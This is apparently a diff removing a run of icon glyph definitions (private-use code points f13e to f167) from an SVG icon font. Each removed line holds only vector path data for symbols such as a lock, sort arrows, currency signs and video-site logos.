-<glyph unicode="&#xf13e;" horiz-adv-x="1152" d="M1056 768q40 0 68 -28t28 -68v-576q0 -40 -28 -68t-68 -28h-960q-40 0 -68 28t-28 68v576q0 40 28 68t68 28h32v320q0 185 131.5 316.5t316.5 131.5t316.5 -131.5t131.5 -316.5q0 -26 -19 -45t-45 -19h-64q-26 0 -45 19t-19 45q0 106 -75 181t-181 75t-181 -75t-75 -181 v-320h736z" />
-<glyph unicode="&#xf140;" d="M1024 640q0 -106 -75 -181t-181 -75t-181 75t-75 181t75 181t181 75t181 -75t75 -181zM1152 640q0 159 -112.5 271.5t-271.5 112.5t-271.5 -112.5t-112.5 -271.5t112.5 -271.5t271.5 -112.5t271.5 112.5t112.5 271.5zM1280 640q0 -212 -150 -362t-362 -150t-362 150 t-150 362t150 362t362 150t362 -150t150 -362zM1408 640q0 130 -51 248.5t-136.5 204t-204 136.5t-248.5 51t-248.5 -51t-204 -136.5t-136.5 -204t-51 -248.5t51 -248.5t136.5 -204t204 -136.5t248.5 -51t248.5 51t204 136.5t136.5 204t51 248.5zM1536 640 q0 -209 -103 -385.5t-279.5 -279.5t-385.5 -103t-385.5 103t-279.5 279.5t-103 385.5t103 385.5t279.5 279.5t385.5 103t385.5 -103t279.5 -279.5t103 -385.5z" />
-<glyph unicode="&#xf141;" horiz-adv-x="1408" d="M384 800v-192q0 -40 -28 -68t-68 -28h-192q-40 0 -68 28t-28 68v192q0 40 28 68t68 28h192q40 0 68 -28t28 -68zM896 800v-192q0 -40 -28 -68t-68 -28h-192q-40 0 -68 28t-28 68v192q0 40 28 68t68 28h192q40 0 68 -28t28 -68zM1408 800v-192q0 -40 -28 -68t-68 -28h-192 q-40 0 -68 28t-28 68v192q0 40 28 68t68 28h192q40 0 68 -28t28 -68z" />
-<glyph unicode="&#xf142;" horiz-adv-x="384" d="M384 288v-192q0 -40 -28 -68t-68 -28h-192q-40 0 -68 28t-28 68v192q0 40 28 68t68 28h192q40 0 68 -28t28 -68zM384 800v-192q0 -40 -28 -68t-68 -28h-192q-40 0 -68 28t-28 68v192q0 40 28 68t68 28h192q40 0 68 -28t28 -68zM384 1312v-192q0 -40 -28 -68t-68 -28h-192 q-40 0 -68 28t-28 68v192q0 40 28 68t68 28h192q40 0 68 -28t28 -68z" />
-<glyph unicode="&#xf143;" d="M512 256q0 53 -37.5 90.5t-90.5 37.5t-90.5 -37.5t-37.5 -90.5t37.5 -90.5t90.5 -37.5t90.5 37.5t37.5 90.5zM863 162q-13 232 -177 396t-396 177q-14 1 -24 -9t-10 -23v-128q0 -13 8.5 -22t21.5 -10q154 -11 264 -121t121 -264q1 -13 10 -21.5t22 -8.5h128q13 0 23 10 t9 24zM1247 161q-5 154 -56 297.5t-139.5 260t-205 205t-260 139.5t-297.5 56q-14 1 -23 -9q-10 -10 -10 -23v-128q0 -13 9 -22t22 -10q204 -7 378 -111.5t278.5 -278.5t111.5 -378q1 -13 10 -22t22 -9h128q13 0 23 10q11 9 9 23zM1536 1120v-960q0 -119 -84.5 -203.5 t-203.5 -84.5h-960q-119 0 -203.5 84.5t-84.5 203.5v960q0 119 84.5 203.5t203.5 84.5h960q119 0 203.5 -84.5t84.5 -203.5z" />
-<glyph unicode="&#xf144;" d="M768 1408q209 0 385.5 -103t279.5 -279.5t103 -385.5t-103 -385.5t-279.5 -279.5t-385.5 -103t-385.5 103t-279.5 279.5t-103 385.5t103 385.5t279.5 279.5t385.5 103zM1152 585q32 18 32 55t-32 55l-544 320q-31 19 -64 1q-32 -19 -32 -56v-640q0 -37 32 -56 q16 -8 32 -8q17 0 32 9z" />
-<glyph unicode="&#xf145;" horiz-adv-x="1792" d="M1024 1084l316 -316l-572 -572l-316 316zM813 105l618 618q19 19 19 45t-19 45l-362 362q-18 18 -45 18t-45 -18l-618 -618q-19 -19 -19 -45t19 -45l362 -362q18 -18 45 -18t45 18zM1702 742l-907 -908q-37 -37 -90.5 -37t-90.5 37l-126 126q56 56 56 136t-56 136 t-136 56t-136 -56l-125 126q-37 37 -37 90.5t37 90.5l907 906q37 37 90.5 37t90.5 -37l125 -125q-56 -56 -56 -136t56 -136t136 -56t136 56l126 -125q37 -37 37 -90.5t-37 -90.5z" />
-<glyph unicode="&#xf146;" d="M1280 576v128q0 26 -19 45t-45 19h-896q-26 0 -45 -19t-19 -45v-128q0 -26 19 -45t45 -19h896q26 0 45 19t19 45zM1536 1120v-960q0 -119 -84.5 -203.5t-203.5 -84.5h-960q-119 0 -203.5 84.5t-84.5 203.5v960q0 119 84.5 203.5t203.5 84.5h960q119 0 203.5 -84.5 t84.5 -203.5z" />
-<glyph unicode="&#xf147;" horiz-adv-x="1408" d="M1152 736v-64q0 -14 -9 -23t-23 -9h-832q-14 0 -23 9t-9 23v64q0 14 9 23t23 9h832q14 0 23 -9t9 -23zM1280 288v832q0 66 -47 113t-113 47h-832q-66 0 -113 -47t-47 -113v-832q0 -66 47 -113t113 -47h832q66 0 113 47t47 113zM1408 1120v-832q0 -119 -84.5 -203.5 t-203.5 -84.5h-832q-119 0 -203.5 84.5t-84.5 203.5v832q0 119 84.5 203.5t203.5 84.5h832q119 0 203.5 -84.5t84.5 -203.5z" />
-<glyph unicode="&#xf148;" horiz-adv-x="1024" d="M1018 933q-18 -37 -58 -37h-192v-864q0 -14 -9 -23t-23 -9h-704q-21 0 -29 18q-8 20 4 35l160 192q9 11 25 11h320v640h-192q-40 0 -58 37q-17 37 9 68l320 384q18 22 49 22t49 -22l320 -384q27 -32 9 -68z" />
-<glyph unicode="&#xf149;" horiz-adv-x="1024" d="M32 1280h704q13 0 22.5 -9.5t9.5 -23.5v-863h192q40 0 58 -37t-9 -69l-320 -384q-18 -22 -49 -22t-49 22l-320 384q-26 31 -9 69q18 37 58 37h192v640h-320q-14 0 -25 11l-160 192q-13 14 -4 34q9 19 29 19z" />
-<glyph unicode="&#xf14a;" d="M685 237l614 614q19 19 19 45t-19 45l-102 102q-19 19 -45 19t-45 -19l-467 -467l-211 211q-19 19 -45 19t-45 -19l-102 -102q-19 -19 -19 -45t19 -45l358 -358q19 -19 45 -19t45 19zM1536 1120v-960q0 -119 -84.5 -203.5t-203.5 -84.5h-960q-119 0 -203.5 84.5 t-84.5 203.5v960q0 119 84.5 203.5t203.5 84.5h960q119 0 203.5 -84.5t84.5 -203.5z" />
-<glyph unicode="&#xf14b;" d="M404 428l152 -152l-52 -52h-56v96h-96v56zM818 818q14 -13 -3 -30l-291 -291q-17 -17 -30 -3q-14 13 3 30l291 291q17 17 30 3zM544 128l544 544l-288 288l-544 -544v-288h288zM1152 736l92 92q28 28 28 68t-28 68l-152 152q-28 28 -68 28t-68 -28l-92 -92zM1536 1120 v-960q0 -119 -84.5 -203.5t-203.5 -84.5h-960q-119 0 -203.5 84.5t-84.5 203.5v960q0 119 84.5 203.5t203.5 84.5h960q119 0 203.5 -84.5t84.5 -203.5z" />
-<glyph unicode="&#xf14c;" d="M1280 608v480q0 26 -19 45t-45 19h-480q-42 0 -59 -39q-17 -41 14 -70l144 -144l-534 -534q-19 -19 -19 -45t19 -45l102 -102q19 -19 45 -19t45 19l534 534l144 -144q18 -19 45 -19q12 0 25 5q39 17 39 59zM1536 1120v-960q0 -119 -84.5 -203.5t-203.5 -84.5h-960 q-119 0 -203.5 84.5t-84.5 203.5v960q0 119 84.5 203.5t203.5 84.5h960q119 0 203.5 -84.5t84.5 -203.5z" />
-<glyph unicode="&#xf14d;" d="M1005 435l352 352q19 19 19 45t-19 45l-352 352q-30 31 -69 14q-40 -17 -40 -59v-160q-119 0 -216 -19.5t-162.5 -51t-114 -79t-76.5 -95.5t-44.5 -109t-21.5 -111.5t-5 -110.5q0 -181 167 -404q10 -12 25 -12q7 0 13 3q22 9 19 33q-44 354 62 473q46 52 130 75.5 t224 23.5v-160q0 -42 40 -59q12 -5 24 -5q26 0 45 19zM1536 1120v-960q0 -119 -84.5 -203.5t-203.5 -84.5h-960q-119 0 -203.5 84.5t-84.5 203.5v960q0 119 84.5 203.5t203.5 84.5h960q119 0 203.5 -84.5t84.5 -203.5z" />
-<glyph unicode="&#xf14e;" d="M640 448l256 128l-256 128v-256zM1024 1039v-542l-512 -256v542zM1312 640q0 148 -73 273t-198 198t-273 73t-273 -73t-198 -198t-73 -273t73 -273t198 -198t273 -73t273 73t198 198t73 273zM1536 640q0 -209 -103 -385.5t-279.5 -279.5t-385.5 -103t-385.5 103 t-279.5 279.5t-103 385.5t103 385.5t279.5 279.5t385.5 103t385.5 -103t279.5 -279.5t103 -385.5z" />
-<glyph unicode="&#xf150;" d="M1145 861q18 -35 -5 -66l-320 -448q-19 -27 -52 -27t-52 27l-320 448q-23 31 -5 66q17 35 57 35h640q40 0 57 -35zM1280 160v960q0 13 -9.5 22.5t-22.5 9.5h-960q-13 0 -22.5 -9.5t-9.5 -22.5v-960q0 -13 9.5 -22.5t22.5 -9.5h960q13 0 22.5 9.5t9.5 22.5zM1536 1120 v-960q0 -119 -84.5 -203.5t-203.5 -84.5h-960q-119 0 -203.5 84.5t-84.5 203.5v960q0 119 84.5 203.5t203.5 84.5h960q119 0 203.5 -84.5t84.5 -203.5z" />
-<glyph unicode="&#xf151;" d="M1145 419q-17 -35 -57 -35h-640q-40 0 -57 35q-18 35 5 66l320 448q19 27 52 27t52 -27l320 -448q23 -31 5 -66zM1280 160v960q0 13 -9.5 22.5t-22.5 9.5h-960q-13 0 -22.5 -9.5t-9.5 -22.5v-960q0 -13 9.5 -22.5t22.5 -9.5h960q13 0 22.5 9.5t9.5 22.5zM1536 1120v-960 q0 -119 -84.5 -203.5t-203.5 -84.5h-960q-119 0 -203.5 84.5t-84.5 203.5v960q0 119 84.5 203.5t203.5 84.5h960q119 0 203.5 -84.5t84.5 -203.5z" />
-<glyph unicode="&#xf152;" d="M1088 640q0 -33 -27 -52l-448 -320q-31 -23 -66 -5q-35 17 -35 57v640q0 40 35 57q35 18 66 -5l448 -320q27 -19 27 -52zM1280 160v960q0 14 -9 23t-23 9h-960q-14 0 -23 -9t-9 -23v-960q0 -14 9 -23t23 -9h960q14 0 23 9t9 23zM1536 1120v-960q0 -119 -84.5 -203.5 t-203.5 -84.5h-960q-119 0 -203.5 84.5t-84.5 203.5v960q0 119 84.5 203.5t203.5 84.5h960q119 0 203.5 -84.5t84.5 -203.5z" />
-<glyph unicode="&#xf153;" horiz-adv-x="1024" d="M976 229l35 -159q3 -12 -3 -22.5t-17 -14.5l-5 -1q-4 -2 -10.5 -3.5t-16 -4.5t-21.5 -5.5t-25.5 -5t-30 -5t-33.5 -4.5t-36.5 -3t-38.5 -1q-234 0 -409 130.5t-238 351.5h-95q-13 0 -22.5 9.5t-9.5 22.5v113q0 13 9.5 22.5t22.5 9.5h66q-2 57 1 105h-67q-14 0 -23 9 t-9 23v114q0 14 9 23t23 9h98q67 210 243.5 338t400.5 128q102 0 194 -23q11 -3 20 -15q6 -11 3 -24l-43 -159q-3 -13 -14 -19.5t-24 -2.5l-4 1q-4 1 -11.5 2.5l-17.5 3.5t-22.5 3.5t-26 3t-29 2.5t-29.5 1q-126 0 -226 -64t-150 -176h468q16 0 25 -12q10 -12 7 -26 l-24 -114q-5 -26 -32 -26h-488q-3 -37 0 -105h459q15 0 25 -12q9 -12 6 -27l-24 -112q-2 -11 -11 -18.5t-20 -7.5h-387q48 -117 149.5 -185.5t228.5 -68.5q18 0 36 1.5t33.5 3.5t29.5 4.5t24.5 5t18.5 4.5l12 3l5 2q13 5 26 -2q12 -7 15 -21z" />
-<glyph unicode="&#xf154;" horiz-adv-x="1024" d="M1020 399v-367q0 -14 -9 -23t-23 -9h-956q-14 0 -23 9t-9 23v150q0 13 9.5 22.5t22.5 9.5h97v383h-95q-14 0 -23 9.5t-9 22.5v131q0 14 9 23t23 9h95v223q0 171 123.5 282t314.5 111q185 0 335 -125q9 -8 10 -20.5t-7 -22.5l-103 -127q-9 -11 -22 -12q-13 -2 -23 7 q-5 5 -26 19t-69 32t-93 18q-85 0 -137 -47t-52 -123v-215h305q13 0 22.5 -9t9.5 -23v-131q0 -13 -9.5 -22.5t-22.5 -9.5h-305v-379h414v181q0 13 9 22.5t23 9.5h162q14 0 23 -9.5t9 -22.5z" />
-<glyph unicode="&#xf155;" horiz-adv-x="1024" d="M978 351q0 -153 -99.5 -263.5t-258.5 -136.5v-175q0 -14 -9 -23t-23 -9h-135q-13 0 -22.5 9.5t-9.5 22.5v175q-66 9 -127.5 31t-101.5 44.5t-74 48t-46.5 37.5t-17.5 18q-17 21 -2 41l103 135q7 10 23 12q15 2 24 -9l2 -2q113 -99 243 -125q37 -8 74 -8q81 0 142.5 43 t61.5 122q0 28 -15 53t-33.5 42t-58.5 37.5t-66 32t-80 32.5q-39 16 -61.5 25t-61.5 26.5t-62.5 31t-56.5 35.5t-53.5 42.5t-43.5 49t-35.5 58t-21 66.5t-8.5 78q0 138 98 242t255 134v180q0 13 9.5 22.5t22.5 9.5h135q14 0 23 -9t9 -23v-176q57 -6 110.5 -23t87 -33.5 t63.5 -37.5t39 -29t15 -14q17 -18 5 -38l-81 -146q-8 -15 -23 -16q-14 -3 -27 7q-3 3 -14.5 12t-39 26.5t-58.5 32t-74.5 26t-85.5 11.5q-95 0 -155 -43t-60 -111q0 -26 8.5 -48t29.5 -41.5t39.5 -33t56 -31t60.5 -27t70 -27.5q53 -20 81 -31.5t76 -35t75.5 -42.5t62 -50 t53 -63.5t31.5 -76.5t13 -94z" />
-<glyph unicode="&#xf156;" horiz-adv-x="898" d="M898 1066v-102q0 -14 -9 -23t-23 -9h-168q-23 -144 -129 -234t-276 -110q167 -178 459 -536q14 -16 4 -34q-8 -18 -29 -18h-195q-16 0 -25 12q-306 367 -498 571q-9 9 -9 22v127q0 13 9.5 22.5t22.5 9.5h112q132 0 212.5 43t102.5 125h-427q-14 0 -23 9t-9 23v102 q0 14 9 23t23 9h413q-57 113 -268 113h-145q-13 0 -22.5 9.5t-9.5 22.5v133q0 14 9 23t23 9h832q14 0 23 -9t9 -23v-102q0 -14 -9 -23t-23 -9h-233q47 -61 64 -144h171q14 0 23 -9t9 -23z" />
-<glyph unicode="&#xf157;" horiz-adv-x="1027" d="M603 0h-172q-13 0 -22.5 9t-9.5 23v330h-288q-13 0 -22.5 9t-9.5 23v103q0 13 9.5 22.5t22.5 9.5h288v85h-288q-13 0 -22.5 9t-9.5 23v104q0 13 9.5 22.5t22.5 9.5h214l-321 578q-8 16 0 32q10 16 28 16h194q19 0 29 -18l215 -425q19 -38 56 -125q10 24 30.5 68t27.5 61 l191 420q8 19 29 19h191q17 0 27 -16q9 -14 1 -31l-313 -579h215q13 0 22.5 -9.5t9.5 -22.5v-104q0 -14 -9.5 -23t-22.5 -9h-290v-85h290q13 0 22.5 -9.5t9.5 -22.5v-103q0 -14 -9.5 -23t-22.5 -9h-290v-330q0 -13 -9.5 -22.5t-22.5 -9.5z" />
-<glyph unicode="&#xf158;" horiz-adv-x="1280" d="M1043 971q0 100 -65 162t-171 62h-320v-448h320q106 0 171 62t65 162zM1280 971q0 -193 -126.5 -315t-326.5 -122h-340v-118h505q14 0 23 -9t9 -23v-128q0 -14 -9 -23t-23 -9h-505v-192q0 -14 -9.5 -23t-22.5 -9h-167q-14 0 -23 9t-9 23v192h-224q-14 0 -23 9t-9 23v128 q0 14 9 23t23 9h224v118h-224q-14 0 -23 9t-9 23v149q0 13 9 22.5t23 9.5h224v629q0 14 9 23t23 9h539q200 0 326.5 -122t126.5 -315z" />
-<glyph unicode="&#xf159;" horiz-adv-x="1792" d="M514 341l81 299h-159l75 -300q1 -1 1 -3t1 -3q0 1 0.5 3.5t0.5 3.5zM630 768l35 128h-292l32 -128h225zM822 768h139l-35 128h-70zM1271 340l78 300h-162l81 -299q0 -1 0.5 -3.5t1.5 -3.5q0 1 0.5 3t0.5 3zM1382 768l33 128h-297l34 -128h230zM1792 736v-64q0 -14 -9 -23 t-23 -9h-213l-164 -616q-7 -24 -31 -24h-159q-24 0 -31 24l-166 616h-209l-167 -616q-7 -24 -31 -24h-159q-11 0 -19.5 7t-10.5 17l-160 616h-208q-14 0 -23 9t-9 23v64q0 14 9 23t23 9h175l-33 128h-142q-14 0 -23 9t-9 23v64q0 14 9 23t23 9h109l-89 344q-5 15 5 28 q10 12 26 12h137q26 0 31 -24l90 -360h359l97 360q7 24 31 24h126q24 0 31 -24l98 -360h365l93 360q5 24 31 24h137q16 0 26 -12q10 -13 5 -28l-91 -344h111q14 0 23 -9t9 -23v-64q0 -14 -9 -23t-23 -9h-145l-34 -128h179q14 0 23 -9t9 -23z" />
-<glyph unicode="&#xf15a;" horiz-adv-x="1280" d="M1167 896q18 -182 -131 -258q117 -28 175 -103t45 -214q-7 -71 -32.5 -125t-64.5 -89t-97 -58.5t-121.5 -34.5t-145.5 -15v-255h-154v251q-80 0 -122 1v-252h-154v255q-18 0 -54 0.5t-55 0.5h-200l31 183h111q50 0 58 51v402h16q-6 1 -16 1v287q-13 68 -89 68h-111v164 l212 -1q64 0 97 1v252h154v-247q82 2 122 2v245h154v-252q79 -7 140 -22.5t113 -45t82.5 -78t36.5 -114.5zM952 351q0 36 -15 64t-37 46t-57.5 30.5t-65.5 18.5t-74 9t-69 3t-64.5 -1t-47.5 -1v-338q8 0 37 -0.5t48 -0.5t53 1.5t58.5 4t57 8.5t55.5 14t47.5 21t39.5 30 t24.5 40t9.5 51zM881 827q0 33 -12.5 58.5t-30.5 42t-48 28t-55 16.5t-61.5 8t-58 2.5t-54 -1t-39.5 -0.5v-307q5 0 34.5 -0.5t46.5 0t50 2t55 5.5t51.5 11t48.5 18.5t37 27t27 38.5t9 51z" />
-<glyph unicode="&#xf15b;" horiz-adv-x="1280" d="M1280 768v-800q0 -40 -28 -68t-68 -28h-1088q-40 0 -68 28t-28 68v1344q0 40 28 68t68 28h544v-544q0 -40 28 -68t68 -28h544zM1277 896h-509v509q82 -15 132 -65l312 -312q50 -50 65 -132z" />
-<glyph unicode="&#xf15c;" horiz-adv-x="1280" d="M1024 160v64q0 14 -9 23t-23 9h-704q-14 0 -23 -9t-9 -23v-64q0 -14 9 -23t23 -9h704q14 0 23 9t9 23zM1024 416v64q0 14 -9 23t-23 9h-704q-14 0 -23 -9t-9 -23v-64q0 -14 9 -23t23 -9h704q14 0 23 9t9 23zM1280 768v-800q0 -40 -28 -68t-68 -28h-1088q-40 0 -68 28 t-28 68v1344q0 40 28 68t68 28h544v-544q0 -40 28 -68t68 -28h544zM1277 896h-509v509q82 -15 132 -65l312 -312q50 -50 65 -132z" />
-<glyph unicode="&#xf15d;" horiz-adv-x="1664" d="M1191 1128h177l-72 218l-12 47q-2 16 -2 20h-4l-3 -20q0 -1 -3.5 -18t-7.5 -29zM736 96q0 -12 -10 -24l-319 -319q-10 -9 -23 -9q-12 0 -23 9l-320 320q-15 16 -7 35q8 20 30 20h192v1376q0 14 9 23t23 9h192q14 0 23 -9t9 -23v-1376h192q14 0 23 -9t9 -23zM1572 -23 v-233h-584v90l369 529q12 18 21 27l11 9v3q-2 0 -6.5 -0.5t-7.5 -0.5q-12 -3 -30 -3h-232v-115h-120v229h567v-89l-369 -530q-6 -8 -21 -26l-11 -11v-2l14 2q9 2 30 2h248v119h121zM1661 874v-106h-288v106h75l-47 144h-243l-47 -144h75v-106h-287v106h70l230 662h162 l230 -662h70z" />
-<glyph unicode="&#xf15e;" horiz-adv-x="1664" d="M1191 104h177l-72 218l-12 47q-2 16 -2 20h-4l-3 -20q0 -1 -3.5 -18t-7.5 -29zM736 96q0 -12 -10 -24l-319 -319q-10 -9 -23 -9q-12 0 -23 9l-320 320q-15 16 -7 35q8 20 30 20h192v1376q0 14 9 23t23 9h192q14 0 23 -9t9 -23v-1376h192q14 0 23 -9t9 -23zM1661 -150 v-106h-288v106h75l-47 144h-243l-47 -144h75v-106h-287v106h70l230 662h162l230 -662h70zM1572 1001v-233h-584v90l369 529q12 18 21 27l11 9v3q-2 0 -6.5 -0.5t-7.5 -0.5q-12 -3 -30 -3h-232v-115h-120v229h567v-89l-369 -530q-6 -8 -21 -26l-11 -10v-3l14 3q9 1 30 1h248 v119h121z" />
-<glyph unicode="&#xf160;" horiz-adv-x="1792" d="M736 96q0 -12 -10 -24l-319 -319q-10 -9 -23 -9q-12 0 -23 9l-320 320q-15 16 -7 35q8 20 30 20h192v1376q0 14 9 23t23 9h192q14 0 23 -9t9 -23v-1376h192q14 0 23 -9t9 -23zM1792 -32v-192q0 -14 -9 -23t-23 -9h-832q-14 0 -23 9t-9 23v192q0 14 9 23t23 9h832 q14 0 23 -9t9 -23zM1600 480v-192q0 -14 -9 -23t-23 -9h-640q-14 0 -23 9t-9 23v192q0 14 9 23t23 9h640q14 0 23 -9t9 -23zM1408 992v-192q0 -14 -9 -23t-23 -9h-448q-14 0 -23 9t-9 23v192q0 14 9 23t23 9h448q14 0 23 -9t9 -23zM1216 1504v-192q0 -14 -9 -23t-23 -9h-256 q-14 0 -23 9t-9 23v192q0 14 9 23t23 9h256q14 0 23 -9t9 -23z" />
-<glyph unicode="&#xf161;" horiz-adv-x="1792" d="M1216 -32v-192q0 -14 -9 -23t-23 -9h-256q-14 0 -23 9t-9 23v192q0 14 9 23t23 9h256q14 0 23 -9t9 -23zM736 96q0 -12 -10 -24l-319 -319q-10 -9 -23 -9q-12 0 -23 9l-320 320q-15 16 -7 35q8 20 30 20h192v1376q0 14 9 23t23 9h192q14 0 23 -9t9 -23v-1376h192 q14 0 23 -9t9 -23zM1408 480v-192q0 -14 -9 -23t-23 -9h-448q-14 0 -23 9t-9 23v192q0 14 9 23t23 9h448q14 0 23 -9t9 -23zM1600 992v-192q0 -14 -9 -23t-23 -9h-640q-14 0 -23 9t-9 23v192q0 14 9 23t23 9h640q14 0 23 -9t9 -23zM1792 1504v-192q0 -14 -9 -23t-23 -9h-832 q-14 0 -23 9t-9 23v192q0 14 9 23t23 9h832q14 0 23 -9t9 -23z" />
-<glyph unicode="&#xf162;" d="M1346 223q0 63 -44 116t-103 53q-52 0 -83 -37t-31 -94t36.5 -95t104.5 -38q50 0 85 27t35 68zM736 96q0 -12 -10 -24l-319 -319q-10 -9 -23 -9q-12 0 -23 9l-320 320q-15 16 -7 35q8 20 30 20h192v1376q0 14 9 23t23 9h192q14 0 23 -9t9 -23v-1376h192q14 0 23 -9t9 -23 zM1486 165q0 -62 -13 -121.5t-41 -114t-68 -95.5t-98.5 -65.5t-127.5 -24.5q-62 0 -108 16q-24 8 -42 15l39 113q15 -7 31 -11q37 -13 75 -13q84 0 134.5 58.5t66.5 145.5h-2q-21 -23 -61.5 -37t-84.5 -14q-106 0 -173 71.5t-67 172.5q0 105 72 178t181 73q123 0 205 -94.5 t82 -252.5zM1456 882v-114h-469v114h167v432q0 7 0.5 19t0.5 17v16h-2l-7 -12q-8 -13 -26 -31l-62 -58l-82 86l192 185h123v-654h165z" />
-<glyph unicode="&#xf163;" d="M1346 1247q0 63 -44 116t-103 53q-52 0 -83 -37t-31 -94t36.5 -95t104.5 -38q50 0 85 27t35 68zM736 96q0 -12 -10 -24l-319 -319q-10 -9 -23 -9q-12 0 -23 9l-320 320q-15 16 -7 35q8 20 30 20h192v1376q0 14 9 23t23 9h192q14 0 23 -9t9 -23v-1376h192q14 0 23 -9 t9 -23zM1456 -142v-114h-469v114h167v432q0 7 0.5 19t0.5 17v16h-2l-7 -12q-8 -13 -26 -31l-62 -58l-82 86l192 185h123v-654h165zM1486 1189q0 -62 -13 -121.5t-41 -114t-68 -95.5t-98.5 -65.5t-127.5 -24.5q-62 0 -108 16q-24 8 -42 15l39 113q15 -7 31 -11q37 -13 75 -13 q84 0 134.5 58.5t66.5 145.5h-2q-21 -23 -61.5 -37t-84.5 -14q-106 0 -173 71.5t-67 172.5q0 105 72 178t181 73q123 0 205 -94.5t82 -252.5z" />
-<glyph unicode="&#xf164;" horiz-adv-x="1664" d="M256 192q0 26 -19 45t-45 19q-27 0 -45.5 -19t-18.5 -45q0 -27 18.5 -45.5t45.5 -18.5q26 0 45 18.5t19 45.5zM416 704v-640q0 -26 -19 -45t-45 -19h-288q-26 0 -45 19t-19 45v640q0 26 19 45t45 19h288q26 0 45 -19t19 -45zM1600 704q0 -86 -55 -149q15 -44 15 -76 q3 -76 -43 -137q17 -56 0 -117q-15 -57 -54 -94q9 -112 -49 -181q-64 -76 -197 -78h-36h-76h-17q-66 0 -144 15.5t-121.5 29t-120.5 39.5q-123 43 -158 44q-26 1 -45 19.5t-19 44.5v641q0 25 18 43.5t43 20.5q24 2 76 59t101 121q68 87 101 120q18 18 31 48t17.5 48.5 t13.5 60.5q7 39 12.5 61t19.5 52t34 50q19 19 45 19q46 0 82.5 -10.5t60 -26t40 -40.5t24 -45t12 -50t5 -45t0.5 -39q0 -38 -9.5 -76t-19 -60t-27.5 -56q-3 -6 -10 -18t-11 -22t-8 -24h277q78 0 135 -57t57 -135z" />
-<glyph unicode="&#xf165;" horiz-adv-x="1664" d="M256 960q0 -26 -19 -45t-45 -19q-27 0 -45.5 19t-18.5 45q0 27 18.5 45.5t45.5 18.5q26 0 45 -18.5t19 -45.5zM416 448v640q0 26 -19 45t-45 19h-288q-26 0 -45 -19t-19 -45v-640q0 -26 19 -45t45 -19h288q26 0 45 19t19 45zM1545 597q55 -61 55 -149q-1 -78 -57.5 -135 t-134.5 -57h-277q4 -14 8 -24t11 -22t10 -18q18 -37 27 -57t19 -58.5t10 -76.5q0 -24 -0.5 -39t-5 -45t-12 -50t-24 -45t-40 -40.5t-60 -26t-82.5 -10.5q-26 0 -45 19q-20 20 -34 50t-19.5 52t-12.5 61q-9 42 -13.5 60.5t-17.5 48.5t-31 48q-33 33 -101 120q-49 64 -101 121 t-76 59q-25 2 -43 20.5t-18 43.5v641q0 26 19 44.5t45 19.5q35 1 158 44q77 26 120.5 39.5t121.5 29t144 15.5h17h76h36q133 -2 197 -78q58 -69 49 -181q39 -37 54 -94q17 -61 0 -117q46 -61 43 -137q0 -32 -15 -76z" />
-<glyph unicode="&#xf166;" d="M919 233v157q0 50 -29 50q-17 0 -33 -16v-224q16 -16 33 -16q29 0 29 49zM1103 355h66v34q0 51 -33 51t-33 -51v-34zM532 621v-70h-80v-423h-74v423h-78v70h232zM733 495v-367h-67v40q-39 -45 -76 -45q-33 0 -42 28q-6 16 -6 54v290h66v-270q0 -24 1 -26q1 -15 15 -15 q20 0 42 31v280h67zM985 384v-146q0 -52 -7 -73q-12 -42 -53 -42q-35 0 -68 41v-36h-67v493h67v-161q32 40 68 40q41 0 53 -42q7 -21 7 -74zM1236 255v-9q0 -29 -2 -43q-3 -22 -15 -40q-27 -40 -80 -40q-52 0 -81 38q-21 27 -21 86v129q0 59 20 86q29 38 80 38t78 -38 q21 -28 21 -86v-76h-133v-65q0 -51 34 -51q24 0 30 26q0 1 0.5 7t0.5 16.5v21.5h68zM785 1079v-156q0 -51 -32 -51t-32 51v156q0 52 32 52t32 -52zM1318 366q0 177 -19 260q-10 44 -43 73.5t-76 34.5q-136 15 -412 15q-275 0 -411 -15q-44 -5 -76.5 -34.5t-42.5 -73.5 q-20 -87 -20 -260q0 -176 20 -260q10 -43 42.5 -73t75.5 -35q137 -15 412 -15t412 15q43 5 75.5 35t42.5 73q20 84 20 260zM563 1017l90 296h-75l-51 -195l-53 195h-78l24 -69t23 -69q35 -103 46 -158v-201h74v201zM852 936v130q0 58 -21 87q-29 38 -78 38q-51 0 -78 -38 q-21 -29 -21 -87v-130q0 -58 21 -87q27 -38 78 -38q49 0 78 38q21 27 21 87zM1033 816h67v370h-67v-283q-22 -31 -42 -31q-15 0 -16 16q-1 2 -1 26v272h-67v-293q0 -37 6 -55q11 -27 43 -27q36 0 77 45v-40zM1536 1120v-960q0 -119 -84.5 -203.5t-203.5 -84.5h-960 q-119 0 -203.5 84.5t-84.5 203.5v960q0 119 84.5 203.5t203.5 84.5h960q119 0 203.5 -84.5t84.5 -203.5z" />
-<glyph unicode="&#xf167;" d="M971 292v-211q0 -67 -39 -67q-23 0 -45 22v301q22 22 45 22q39 0 39 -67zM1309 291v-46h-90v46q0 68 45 68t45 -68zM343 509h107v94h-312v-94h105v-569h100v569zM631 -60h89v494h-89v-378q-30 -42 -57 -42q-18 0 -21 21q-1 3 -1 35v364h-89v-391q0 -49 8 -73 q12 -37 58 -37q48 0 102 61v-54zM1060 88v197q0 73 -9 99q-17 56 -71 56q-50 0 -93 -54v217h-89v-663h89v48q45 -55 93 -55q54 0 71 55q9 27 9 100zM1398 98v13h-91q0 -51 -2 -61q-7 -36 -40 -36q-46 0 -46 69v87h179v103q0 79 -27 116q-39 51 -106 51q-68 0 -107 -51 q-28 -37 -28 -116v-173q0 -79 29 -116q39 -51 108 -51q72 0 108 53q18 27 21 54q2 9 2 58zM790 1011v210q0 69 -43 69t-43 -69v-210q0 -70 43 -70t43 70zM1509 260q0 -234 -26 -350q-14 -59 -58 -99t-102 -46q-184 -21 -555 -21t-555 21q-58 6 -102.5 46t-57.5 99 q-26 112 -26 350q0 234 26 350q14 59 58 99t103 47q183 20 554 20t555 -20q58 -7 102.5 -47t57.5 -99q26 -112 26 -350zM511 1536h102l-121 -399v-271h-100v271q-14 74 -61 212q-37 103 -65 187h106l71 -263zM881 1203v-175q0 -81 -28 -118q-37 -51 -106 -51q-67 0 -105 51 q-28 38 -28 118v175q0 80 28 117q38 51 105 51q69 0 106 -51q28 -37 28 -117zM1216 1365v-499h-91v55q-53 -62 -103 -62q-46 0 -59 37q-8 24 -8 75v394h91v-367q0 -33 1 -35q3 -22 21 -22q27 0 57 43v381h91z" />
